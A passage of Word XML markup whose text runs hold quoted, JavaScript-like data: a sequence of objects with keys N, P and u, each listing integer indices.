    <w:p w14:paraId="490F8CE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [19, 10, 22, 9, 14, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C6123" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 22, 23, 24, 25, 26],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E476DE8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [21, 39, 126, 137, 159, 248, 281, 284, 301, 311, 317, 345, 350, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550303B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056FDD4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 3, 1, 11, 12, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5454A946" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEEB4A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [142, 152, 209, 269, 299, 331]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369441EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B21F33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63DC43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E05F68B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D0043E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783F9EE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBF0E35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B90D375" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [2, 4, 10, 11, 15, 16, 19, 21, 23, 24, 25, 27, 151]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CFEED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039CB89F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E635C3E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D67E02" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ACD125" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E037AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC4F3BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C77839" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [41, 114]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BDF06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B87CB7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239639E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55371A85" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 12, 19, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01397B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007035E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38190544" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EBCC8F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B134F09" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECBD1E1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F74C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F3662" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 19, 37, 89, 128, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86037A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724029CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22906615" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8E78F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 8, 13, 18, 20, 21, 67, 90, 109, 131, 159, 173, 252, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C807B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC6B6A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911B859" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9E51A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D370E2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427DE98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28932591" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014F5EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B8587" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE4C42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 21, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B04D01" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686EEB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A3AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F13B201" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 8, 23]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A0DD3B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0353E67F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE433E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522688B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 7, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B573071" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA2ABA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14760CF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB5E8F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 4, 5, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC741BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10317C1A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572AAEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 6, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 28, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13B910" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 5, 7, 8, 27, 32, 40, 179, 223, 227, 337]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF5D6D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FE46F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490B34E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8DC01" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1CEFA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7422929C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F6CAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8E206" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B63A413" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A209A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE1A606" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB0FE5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D8441" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53179711" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B3EC4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0973CC02" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 19, 37, 89, 128, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66244C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8B3A98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753C1E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53423E97" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67FCE0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CE4EF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC76A35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464254BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B99632" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC3FD90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE371D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9296CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 10, 67, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB006B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FEAF4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429779AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4823F335" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263620C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05945B0C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27758C4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393BDCF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5A09E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F8EE3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [318],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18296ADE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165,166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312,313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F5764E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC855E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1693F794" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458DA409" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DABABE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133B042F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1C4DE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE54DB2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E250AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [51, 169]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DBA5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23607E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6139B264" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D8063" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 27, 29, 71, 78, 97, 108, 110, 134, 136, 215, 232, 260, 298, 319, 355]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B362E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
